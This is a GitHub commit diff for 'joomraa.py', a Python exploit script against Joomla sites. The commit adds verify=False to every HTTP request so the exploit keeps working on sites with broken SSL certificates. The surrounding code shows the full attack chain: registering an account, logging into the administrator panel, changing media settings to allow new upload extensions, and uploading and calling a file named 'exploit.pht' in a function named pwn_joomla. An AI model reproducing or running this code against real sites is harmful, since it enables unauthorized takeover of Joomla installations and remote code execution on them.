Skip to content

Commit da08837

Browse files
random-robbierandom-robbie
authored
Ignore SSL
Found some sites have issues with the SSL cert so adding ignore to allow exploit to still continue.
1 parent b98da60 commit da08837

File tree

1 file changed

+9
-9
lines changed

1 file changed

+9
-9
lines changed

Joomraa/joomraa.py

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -42,7 +42,7 @@ def extract_token(resp):
4242
def try_admin_login(options, sess):
4343
admin_url = options.url + '/administrator/index.php'
4444
print('[-] Getting token for admin login')
45-
resp = sess.get(admin_url)
45+
resp = sess.get(admin_url, verify=False)
4646
token = extract_token(resp)
4747
if not token:
4848
return False
@@ -53,7 +53,7 @@ def try_admin_login(options, sess):
5353
'task': 'login',
5454
token: '1'
5555
}
56-
resp = sess.post(admin_url, data=data)
56+
resp = sess.post(admin_url, data=data, verify=False)
5757
if 'task=profile.edit' not in resp.text:
5858
print('[!] Admin Login Failure!')
5959
return
@@ -63,7 +63,7 @@ def try_admin_login(options, sess):
6363
def get_media_options(options, sess):
6464
print("[+] Getting media options")
6565
media_options_url = options.url + '/administrator/index.php?option=com_config&view=component&component=com_media&path='
66-
resp = sess.get(media_options_url)
66+
resp = sess.get(media_options_url, verify=False)
6767
results = re.findall(r'name="([^"]+)"\s+[^>]*?value="([^"]+)"', resp.text, re.S)
6868
if not results:
6969
print("[!] Fail")
@@ -92,7 +92,7 @@ def set_media_options(options, sess, data):
9292
newdata['component'] = 'com_media'
9393
newdata['task'] = 'config.save.component.apply'
9494
config_url = options.url + '/administrator/index.php?option=com_config'
95-
resp = sess.post(config_url, data=newdata)
95+
resp = sess.post(config_url, data=newdata, verify=False)
9696
if 'jform[upload_extensions]' not in resp.text:
9797
print('[!] Maybe failed to set media options...')
9898
return False
@@ -125,7 +125,7 @@ def stage_two(options, sess):
125125
def upload_file(options, sess, image_path):
126126
print("[*] Uploading exploit.pht")
127127
url = options.url + "/administrator/index.php?option=com_media&folder="
128-
resp = sess.get(url)
128+
resp = sess.get(url, verify=False)
129129
match = re.search(r'form action="([^"]+)" id="uploadForm"', resp.text, re.S)
130130
if not match:
131131
print("[!] Cannot find file upload form!")
@@ -138,12 +138,12 @@ def upload_file(options, sess, image_path):
138138
'Filedata[]': (filename, options.exploit, 'application/octet-stream')
139139
}
140140
data = dict(folder="")
141-
resp = sess.post(upload_url, files=files, data=data)
141+
resp = sess.post(upload_url, files=files, data=data, verify=False)
142142
if filename not in resp.content:
143143
print("[!] Failed to upload file!")
144144
return False
145145
print("[*] Calling exploit")
146-
resp = sess.get(exploit_url)
146+
resp = sess.get(exploit_url, verify=False)
147147
if options.search not in resp.content:
148148
print("[!] Search string not in exploit")
149149
print(resp)
@@ -179,7 +179,7 @@ def create_user(options, sess, token):
179179
'form[task]': 'user.register',
180180
token: '1',
181181
}
182-
return sess.post(options.url + "/index.php/component/users/?task=user.register", data=data, allow_redirects=False)
182+
return sess.post(options.url + "/index.php/component/users/?task=user.register", data=data, allow_redirects=False, verify=False)
183183

184184
def parse_options():
185185
try:
@@ -198,7 +198,7 @@ def parse_options():
198198
def pwn_joomla(options):
199199
sess = requests.Session()
200200
print("[-] Getting token")
201-
resp = sess.get(options.url + "/index.php/component/users/?view=login")
201+
resp = sess.get(options.url + "/index.php/component/users/?view=login", verify=False)
202202
token = extract_token(resp)
203203
if not token:
204204
return False

0 commit comments

Comments
 (0)